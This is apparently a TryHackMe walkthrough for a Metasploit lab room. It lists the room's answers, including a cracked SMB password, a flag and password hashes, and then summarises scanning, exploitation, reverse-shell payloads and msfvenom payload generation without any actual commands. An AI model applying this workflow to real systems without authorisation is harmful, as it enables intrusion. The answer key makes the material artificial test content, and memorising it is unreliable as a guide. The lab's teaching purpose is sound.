Easy January 28, 2026

TryHackMe – Metasploit: Exploitation

Using Metasploit for scanning, vulnerability assessment and exploitation.

#cyber-security-101 #tryhackme #walkthrough

Answers

How many ports are open on the target system?

5

Using the relevant scanner, what NetBIOS name can you see?

ACME IT SUPPORT

What is running on port 8000?

webfs/1.21

What is the “penny” user’s SMB password? Use the wordlist mentioned in the previous task.

leo1234

Who wrote the module that allows us to check SMTP servers for open relay?

Campbell Murray

What is the content of the flag.txt file?

THM-5455554845

What is the NTLM hash of the password of the user “pirate”?

8ce9a3ebd1647fcc5e04025019f4b875

What is the other user’s password hash?

$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0

Things You Should Know

Metasploit is a powerful ethical hacking and penetration-testing framework used in legal lab environments (like TryHackMe) to discover, analyze, and safely test vulnerabilities in computer systems. It provides tools for the entire testing process — from reconnaissance to controlled exploitation and payload generation.

1. Scanning & Enumeration

Before any exploitation, testers must understand the target system.

Port Scanning

Metasploit contains auxiliary scanner modules to find open ports and services.

Common options:

  • RHOSTS – target IP(s)
  • PORTS – port range
  • THREADS / CONCURRENCY – speed of scan

Metasploit can also run Nmap directly, which is often faster for large scans.

Service Identification

Modules exist for specific services:

  • SMB Scans – reveal Windows versions, hostnames, shares.
  • UDP Sweep – quickly find UDP services like NetBIOS or DNS.
  • HTTP / FTP / SSH / RDP checks – identify common entry points.

Example Lab Findings

  • 5 open ports discovered
  • NetBIOS name identified
  • Web service running on port 8000
  • SMB credentials found using a wordlist

These steps demonstrate reconnaissance and enumeration, which are essential before any exploit attempt.

2. Metasploit Database & Workspaces

When testing multiple systems, Metasploit’s database helps organize information.

Purpose

  • Store scan results
  • Avoid re-entering target data
  • Manage multiple projects

Key Features

  • Workspaces – separate projects or targets.
  • db_nmap – runs Nmap and automatically saves results.
  • hosts / services / vulns – quickly list discovered information.
  • hosts -R – automatically sets saved IPs as targets.

This allows testers to search for patterns, such as all machines running SMB or HTTP, and quickly focus on “low-hanging fruit” vulnerabilities.

3. Vulnerability Scanning

Metasploit provides scanner modules that check for known weaknesses without immediately exploiting them.

Examples:

  • SMB vulnerability checks
  • VNC login scanners
  • Service-specific authentication checks

These modules help identify easy-to-exploit issues such as weak passwords or outdated services.

4. Exploitation

After identifying a vulnerability, Metasploit can safely test whether it is exploitable in a lab.

General workflow:

  1. Search for an exploit module.
  2. Select it with use.
  3. Set target options (IP, port, credentials if needed).
  4. Choose a payload (the code that runs after access is gained).
  5. Run exploit.

Payloads

Payloads determine what happens after access:

  • Reverse shell – target connects back to tester.
  • Bind shell – tester connects to target.
  • Meterpreter – advanced interactive session with many features.

Sessions

Once access is gained:

  • Sessions can be listed, interacted with, renamed, or terminated.
  • Multiple sessions can run simultaneously.
  • Sessions can be backgrounded to continue scanning.

5. Msfvenom – Payload Generation

Msfvenom is Metasploit’s tool for creating standalone payload files in many formats and for many operating systems.

Capabilities

  • Generate payloads for Windows, Linux, Android, PHP, Python, etc.
  • Output formats: .exe, .elf, .php, .asp, raw scripts, and more.
  • Optional encoding to modify payload structure (not guaranteed to bypass security tools).

Handler (Catching the Shell)

When using reverse payloads, a listener/handler must be running to receive the connection. Metasploit’s multi/handler module is commonly used for this.

Typical flow:

  1. Generate payload with Msfvenom.
  2. Start a handler in Metasploit.
  3. Execute payload on the test machine.
  4. Receive shell or Meterpreter session.

Key Takeaways

  • Scanning comes first – understand the system before exploiting.
  • Database & workspaces keep projects organized.
  • Scanner modules help find weak points quickly.
  • Exploits + Payloads allow controlled testing of vulnerabilities.
  • Msfvenom + Handlers enable custom payload creation and connection handling.
  • Metasploit is designed for learning and authorized security testing, helping defenders understand real-world attack methods so they can better secure systems.

In short, Metasploit provides a complete ethical penetration-testing workflow: Discover → Organize → Analyze → Test → Access → Manage Sessions → Generate Payloads.